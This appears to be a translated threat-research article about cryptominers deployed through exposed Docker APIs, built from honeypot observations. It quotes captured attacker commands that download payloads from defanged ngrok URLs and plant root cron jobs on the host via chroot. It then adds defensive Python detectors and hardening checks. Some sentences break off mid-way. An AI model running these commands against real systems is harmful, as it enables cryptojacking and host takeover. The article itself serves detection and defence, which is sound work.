We analysed data collected with honeypot containers that we set up to track threats, and found significant activity from unwanted or unauthorised cryptocurrency miners deployed as rogue containers using an image published publicly on Docker Hub. The image is used as part of a service that delivers malicious cryptocurrency miners.
In addition, networking tools are installed to break into neighbouring exposed containers and applications.
We leave our honeypots as they are, that is, with default settings, without any security measures or subsequent installation of additional software. Note that Docker publishes initial setup recommendations to avoid mistakes and simple vulnerabilities. But the honeypots used here are containers designed to detect attacks aimed at the container platform, not at the applications inside the containers.
The malicious activity detected is notable because it requires no vulnerability and is independent of the Docker version. Finding a misconfigured, and therefore exposed, container image is all the attackers need to infect many exposed servers.
An exposed Docker API allows a user to perform a wide range of
On the left is the malware delivery method. On the right is the attacker's environment, which allows images to be pulled remotely.
Worldwide distribution of the 3762 exposed Docker APIs. Based on a Shodan search dated 12.02.2019
Attack chain and payload selection
The malicious activity was not observed only through the honeypots. Shodan data shows that the number of exposed Docker APIs (see the second graph) has grown since we investigated a misconfigured container used as a bridge for deploying Monero cryptocurrency mining software. In October last year (2018; the current data
Analysis of the honeypot logs showed that the use of the container image was also associated with the use of
Tty: false,
Cmd: "-c curl --retry 3 -m 60 -o /tmp9bedce/tmp/tmpfilece427fe0eb0426d997cb0455f9fbd283d \"hxxp://12f414f1[.]ngrok[.]io/f/serve?l=d&r=ce427fe0eb0426d997cb0455f9fbd283\";echo \"* * * * * root sh /tmp/tmpfilece427fe0eb0426d997cb0455f9fbd283d\" >/tmp9bedce/etc/crontab;echo \"* * * * * root sh /tmp/tmpfilece427fe0eb0426d997cb0455f9fbd283d\" >/tmp9bedce/etc/cron.d/1m;chroot /tmp9bedce sh -c \"cron || crond\"",
Entrypoint: "/bin/sh"
Tty: false,
Cmd: "-c curl --retry 3 -m 60 -o /tmp570547/tmp/tmpfilece427fe0eb0426d997cb0455f9fbd283d \"hxxp://5249d5f6[.]ngrok[.]io/f/serve?l=d&r=ce427fe0eb0426d997cb0455f9fbd283\";echo \"* * * * * root sh /tmp/tmpfilece427fe0eb0426d997cb0455f9fbd283d\" >/tmp570547/etc/crontab;echo \"* * * * * root sh /tmp/tmpfilece427fe0eb0426d997cb0455f9fbd283d\" >/tmp570547/etc/cron.d/1m;chroot /tmp570547 sh -c \"cron || crond\"",
Entrypoint: "/bin/sh"
Tty: false,
Cmd: "-c curl --retry 3 -m 60 -o /tmp326c80/tmp/tmpfilece427fe0eb0426d9aa8e1b9ec086e4eed \"hxxp://b27562c1[.]ngrok[.]io/f/serve?l=d&r=ce427fe0eb0426d9aa8e1b9ec086e4ee\";echo \"* * * * * root sh /tmp/tmpfilece427fe0eb0426d9aa8e1b9ec086e4eed\" >/tmp326c80/etc/crontab;echo \"* * * * * root sh /tmp/tmpfilece427fe0eb0426d9aa8e1b9ec086e4eed\" >/tmp326c80/etc/cron.d/1m;chroot /tmp326c80 sh -c \"cron || crond\"",
Entrypoint: "/bin/sh",
Tty: false,
Cmd: "-c curl --retry 3 -m 60 -o /tmp8b9b5b/tmp/tmpfilece427fe0eb0426d9aa8e1b9ec086e4eed \"hxxp://f30c8cf9[.]ngrok[.]io/f/serve?l=d&r=ce427fe0eb0426d9aa8e1b9ec086e4ee\";echo \"* * * * * root sh /tmp/tmpfilece427fe0eb0426d9aa8e1b9ec086e4eed\" >/tmp8b9b5b/etc/crontab;echo \"* * * * * root sh /tmp/tmpfilece427fe0eb0426d9aa8e1b9ec086e4eed\" >/tmp8b9b5b/etc/cron.d/1m;chroot /tmp8b9b5b sh -c \"cron || crond\"",
Entrypoint: "/bin/sh"
As you can see, the dropped files are downloaded from URLs that change frequently. These URLs have a short lifetime, so the payload can no longer be downloaded once they expire.
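The captured container-create requests above share one shape: a throwaway image, a download from a short-lived tunnel hostname, two crontab writes through a path that can only be a bind mount of the host filesystem, and a chroot to start cron on the host. The following Python detector is an added example written for this post, not code from the original article or from Trend Micro. It reproduces the first captured record as a Docker Engine API request body; the Entrypoint and Cmd fields are taken from the capture (URL left defanged as printed), while the Image name and the HostConfig.Binds entry are assumptions, since the capture does not show them. A defender can run the same checks over the JSON bodies logged by an API gateway or by daemon audit logging.

```python
import re
from typing import Any, Dict, List

# One record from the captured commands above, laid out as the body of a
# Docker Engine API "create container" request. Entrypoint and Cmd are taken
# from the capture (URL left defanged as printed). The Image name and the
# HostConfig.Binds entry are ASSUMED: the capture does not show them, but a
# chroot into /tmp9bedce only works if the host filesystem is mounted there.
CAPTURED_REQUEST: Dict[str, Any] = {
    "Image": "alpine-curl",
    "Entrypoint": "/bin/sh",
    "Cmd": [
        "-c",
        'curl --retry 3 -m 60 -o /tmp9bedce/tmp/tmpfilece427fe0eb0426d997cb0455f9fbd283d '
        '"hxxp://12f414f1[.]ngrok[.]io/f/serve?l=d&r=ce427fe0eb0426d997cb0455f9fbd283";'
        'echo "* * * * * root sh /tmp/tmpfilece427fe0eb0426d997cb0455f9fbd283d" >/tmp9bedce/etc/crontab;'
        'echo "* * * * * root sh /tmp/tmpfilece427fe0eb0426d997cb0455f9fbd283d" >/tmp9bedce/etc/cron.d/1m;'
        'chroot /tmp9bedce sh -c "cron || crond"',
    ],
    "HostConfig": {"Binds": ["/:/tmp9bedce"]},
}

# A constructed benign request for comparison.
BENIGN_REQUEST: Dict[str, Any] = {
    "Image": "nginx:1.25",
    "Cmd": ["nginx", "-g", "daemon off;"],
    "HostConfig": {"Binds": ["/srv/www:/usr/share/nginx/html:ro"]},
}


def refang(text: str) -> str:
    """Undo the hxxp:// and [.] defanging used when the capture was published."""
    return text.replace("hxxp://", "http://").replace("[.]", ".")


# Each indicator corresponds to something visible in the captured commands.
INDICATORS = {
    "downloader":    re.compile(r"\b(curl|wget)\b.*https?://"),
    "tunnel_domain": re.compile(r"https?://[0-9a-f]{8}\.ngrok\.io", re.IGNORECASE),
    "crontab_write": re.compile(r">\s*\S*/etc/(crontab|cron\.d/\S+)"),
    "chroot_cron":   re.compile(r'chroot\s+\S+\s+sh\s+-c\s+"?cron'),
}
# Host paths that hand the container control of the host when bind-mounted.
SENSITIVE_HOST_PATHS = {"/", "/etc", "/root", "/var/run/docker.sock"}


def _as_list(value: Any) -> List[str]:
    # Entrypoint and Cmd may each be a string or a list in the API.
    if value is None:
        return []
    return [value] if isinstance(value, str) else list(value)


def flag_request(req: Dict[str, Any]) -> List[str]:
    """Return the names of all indicators that fire on one create request."""
    cmdline = refang(" ".join(_as_list(req.get("Entrypoint")) + _as_list(req.get("Cmd"))))
    hits = [name for name, rx in INDICATORS.items() if rx.search(cmdline)]
    for bind in req.get("HostConfig", {}).get("Binds", []):
        if bind.split(":", 1)[0] in SENSITIVE_HOST_PATHS:
            hits.append("sensitive_host_bind")
            break
    return hits


def is_suspicious(req: Dict[str, Any]) -> bool:
    """Cron persistence through a host bind is the exact pattern captured here;
    any two indicators together are also worth an alert."""
    hits = set(flag_request(req))
    return {"crontab_write", "sensitive_host_bind"} <= hits or len(hits) >= 2


if __name__ == "__main__":
    for label, req in (("captured", CAPTURED_REQUEST), ("benign", BENIGN_REQUEST)):
        print(f"{label}: {flag_request(req)} suspicious={is_suspicious(req)}")
```

The bind-mount check is the one that matters most: an attacker who can create containers through an exposed API does not need a container escape, because mounting the host root into the container and writing to its /etc/crontab is ordinary, permitted API behaviour. Alerting on any sensitive host bind, independent of the command line, catches variants that swap curl for another downloader or move the payload off ngrok.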
There are two payload options. The first is a compiled ELF miner for Linux (detected as Coinminer.SH.MALXMR.ATNO) that connects to a mining pool. The second is a script (TrojanSpy.SH.ZNETMAP.A) designed to fetch certain network tools that are used to scan network ranges and then look for new targets.
The dropper script sets two variables, which are then used to deploy the cryptocurrency miner. The HOST variable contains the URL where the malicious files are hosted, and the RIP variable is the file name (in fact, a hash) of the miner to be deployed. The HOST variable changes every time the hash changes. The script also tries to check that no other cryptocurrency miners are running on the attacked server.
Examples of the HOST and RIP variables, and the code snippet used to check that no other miners are running.
Before the miner is started, it is renamed nginx. Other versions of this script rename the miner after other legitimate services that may be present in Linux environments. This is usually enough to pass checks against the list of running processes.
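A process-list check that trusts the name alone is exactly what the rename defeats. The following Python check is an added example written for this post (not the article's or Trend Micro's code) that cross-checks a service-looking process name against what /proc reports about the binary actually running: where it lives, whether it has been unlinked since it started, and whether its name matches the name the process presents. The sample process records are constructed to resemble /proc output; the paths in them are made up. The `load_from_proc()` helper collects the same fields from a live Linux host.

```python
import os
from dataclasses import dataclass
from typing import Dict, List

# Directories where a genuine system service binary is expected to live.
TRUSTED_BIN_DIRS = ("/usr/sbin/", "/usr/bin/", "/sbin/", "/bin/",
                    "/usr/local/sbin/", "/usr/local/bin/", "/usr/lib/")
# Service names worth cross-checking; nginx is the one named in the post.
SERVICE_NAMES = {"nginx", "sshd", "cron", "crond", "systemd", "rsyslogd"}


@dataclass
class Proc:
    pid: int
    comm: str      # /proc/<pid>/comm: the (15-char) name ps and top display
    exe: str       # readlink(/proc/<pid>/exe): the binary actually running
    cmdline: str   # /proc/<pid>/cmdline with NULs replaced by spaces


def masquerade_reasons(p: Proc) -> List[str]:
    """Reasons a process that calls itself a service looks like an impostor."""
    if p.comm not in SERVICE_NAMES:
        return []
    reasons: List[str] = []
    if not p.exe.startswith(TRUSTED_BIN_DIRS):
        reasons.append("exe outside trusted bin dirs")
    real_path = p.exe
    if real_path.endswith(" (deleted)"):
        reasons.append("binary unlinked after start")
        real_path = real_path[: -len(" (deleted)")]
    # A copied-and-renamed miner keeps the fake name; one that only changed
    # argv[0] or used prctl(PR_SET_NAME) still shows its real file name here.
    if os.path.basename(real_path) != p.comm:
        reasons.append("name does not match executable")
    return reasons


def scan(procs: List[Proc]) -> Dict[int, List[str]]:
    """Map pid -> reasons for every process that fails the cross-check."""
    return {p.pid: r for p in procs if (r := masquerade_reasons(p))}


def load_from_proc() -> List[Proc]:
    """Collect live processes on a Linux host (skips ones that vanish or are unreadable)."""
    procs: List[Proc] = []
    for entry in os.listdir("/proc"):
        if not entry.isdigit():
            continue
        try:
            with open(f"/proc/{entry}/comm") as f:
                comm = f.read().strip()
            exe = os.readlink(f"/proc/{entry}/exe")
            with open(f"/proc/{entry}/cmdline", "rb") as f:
                cmdline = f.read().replace(b"\0", b" ").decode(errors="replace").strip()
        except OSError:
            continue
        procs.append(Proc(int(entry), comm, exe, cmdline))
    return procs


# Constructed sample: what /proc would show for a real nginx beside two
# miners renamed "nginx" as the post describes. Paths are made up.
SAMPLE_PROCS = [
    Proc(812, "nginx", "/usr/sbin/nginx", "nginx: master process /usr/sbin/nginx -g daemon off;"),
    Proc(4471, "nginx", "/tmp/.cache/nginx", "nginx"),
    Proc(4490, "nginx", "/tmp/.cache/miner (deleted)", "nginx"),
    Proc(901, "python3", "/usr/bin/python3.11", "python3 app.py"),
]

if __name__ == "__main__":
    for pid, reasons in scan(SAMPLE_PROCS).items():
        print(pid, reasons)
```

Run as root (`scan(load_from_proc())`) so that /proc/<pid>/exe is readable for every process; unprivileged users only see their own. Pair the result with CPU accounting, since a miner named nginx that sits at 100% CPU on a host that serves no web traffic is the combination that stands out.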
The scanning script also has some notable features. It uses the same URL service to deliver the tools it needs. Among them is the zmap binary, which is used to scan the network and obtain a list of open ports. The script also downloads another binary, used to interact with the discovered services and retrieve their banners in order to determine additional information about each discovered service (for example, its version).
The script also predefines some network ranges to scan, but this depends on the script version. It also sets the target ports for the services of interest, in this case Docker, before running the scan.
As soon as possible targets are found, banners are automatically retrieved from them. The script also filters the targets by the services, applications, components or platforms of interest: Redis, Jenkins, Drupal, MODX,
The attack vector is a Docker image, as can be seen in the following two code snippets.
At the top is the renaming to a legitimate service, and at the bottom is how zmap is used to scan the network.
At the top is the predefined list of network ranges, at the bottom the specific ports for detecting services, including Docker
The screenshot shows that the alpine-curl image has been downloaded more than 10 million times
Based on Alpine Linux and curl, an efficient CLI tool for transferring files over various protocols, you can build
It is important to note that this image (alpine-curl) is not malicious by itself, but, as you can see above, it can be used to carry out malicious activity. Similar Docker images can also be used to carry out malicious activity. We contacted Docker and worked with them on this issue.
Recommendations
The incident discussed in this article highlights the need to pay attention to security from the outset, including the following recommendations:
- For system administrators and developers: always check your API settings to make sure everything is configured to accept requests only from a specific server or the internal network.
- Follow the principle of least privilege: make sure container images are signed and verified, restrict access to critical components (the service that launches containers) and add encryption to network connections.
- Follow the recommendations and implement the security mechanisms, e.g. those from Docker, and use the built-in security features.
- Use automated scanning of runtimes and images to obtain additional information about the processes running in the container (for example, to detect spoofing or to check for vulnerabilities). Application control and integrity monitoring help track anomalous changes on servers, in files and in system areas.
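The first two recommendations come down to one setting on the Docker host: whether the daemon listens on a TCP socket, and if so, whether it requires client certificates. The following Python audit is an added example written for this post, not code from the article or from Docker. It shows a weak daemon.json beside a hardened one and flags the weak settings; the configuration keys (`hosts`, `tls`, `tlsverify`, `tlscacert`, `tlscert`, `tlskey`) are the real daemon.json keys for these options, while the addresses and certificate paths are placeholders.

```python
import json
from typing import List

# Two constructed daemon.json files. The keys are the real Docker daemon
# configuration keys for these settings; the addresses and certificate
# paths are placeholders.
WEAK_DAEMON_JSON = """
{
  "hosts": ["unix:///var/run/docker.sock", "tcp://0.0.0.0:2375"]
}
"""

HARDENED_DAEMON_JSON = """
{
  "hosts": ["unix:///var/run/docker.sock", "tcp://10.0.0.5:2376"],
  "tls": true,
  "tlsverify": true,
  "tlscacert": "/etc/docker/certs/ca.pem",
  "tlscert": "/etc/docker/certs/server-cert.pem",
  "tlskey": "/etc/docker/certs/server-key.pem"
}
"""

# Bind addresses that expose the listener on every interface.
ANY_INTERFACE = {"", "0.0.0.0", "[::]", "::"}


def audit_daemon_config(config_text: str) -> List[str]:
    """Return findings for a daemon.json; an empty list means no TCP exposure problem."""
    cfg = json.loads(config_text)
    findings: List[str] = []
    tcp_hosts = [h for h in cfg.get("hosts", []) if h.startswith("tcp://")]
    if not tcp_hosts:
        return findings  # unix socket only: reachable by local users only
    if not cfg.get("tlsverify"):
        findings.append("tcp listener without tlsverify: anyone who can reach the port "
                        "controls the daemon, which is root on the host")
    elif not all(cfg.get(k) for k in ("tlscacert", "tlscert", "tlskey")):
        findings.append("tlsverify set but tlscacert/tlscert/tlskey incomplete")
    for host in tcp_hosts:
        addr = host[len("tcp://"):]
        ip = addr.rsplit(":", 1)[0] if ":" in addr else addr
        if ip in ANY_INTERFACE:
            findings.append(f"{host}: bound to all interfaces; bind a management "
                            "address or filter the port at the host firewall")
    return findings


def audit_file(path: str = "/etc/docker/daemon.json") -> List[str]:
    """Audit the daemon.json on this host (a missing file means unix socket only)."""
    try:
        with open(path) as f:
            return audit_daemon_config(f.read())
    except FileNotFoundError:
        return []


if __name__ == "__main__":
    for label, text in (("weak", WEAK_DAEMON_JSON), ("hardened", HARDENED_DAEMON_JSON)):
        print(label, audit_daemon_config(text) or "ok")
```

Two practical caveats. `tlsverify` is what makes the listener require a client certificate signed by `tlscacert`; `tls` alone only encrypts and still lets anyone connect. And on systemd-based hosts the docker.service unit already passes its own `-H` flag, which conflicts with `hosts` in daemon.json, so the unit's ExecStart has to be overridden when the listener is moved into the file.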
Trend Micro helps DevOps teams build securely, ship fast and run anywhere. Trend Micro
Indicators of compromise
Related hashes:
- 54343fd1555e1f72c2c1d30369013fb40372a88875930c71b8c3a23bbe5bb15e (Coinminer.SH.MALXMR.ATNO)
- f1e53879e992771db6045b94b3f73d11396fbe7b3394103718435982a7161228 (TrojanSpy.SH.ZNETMAP.A)
source: www.habr.com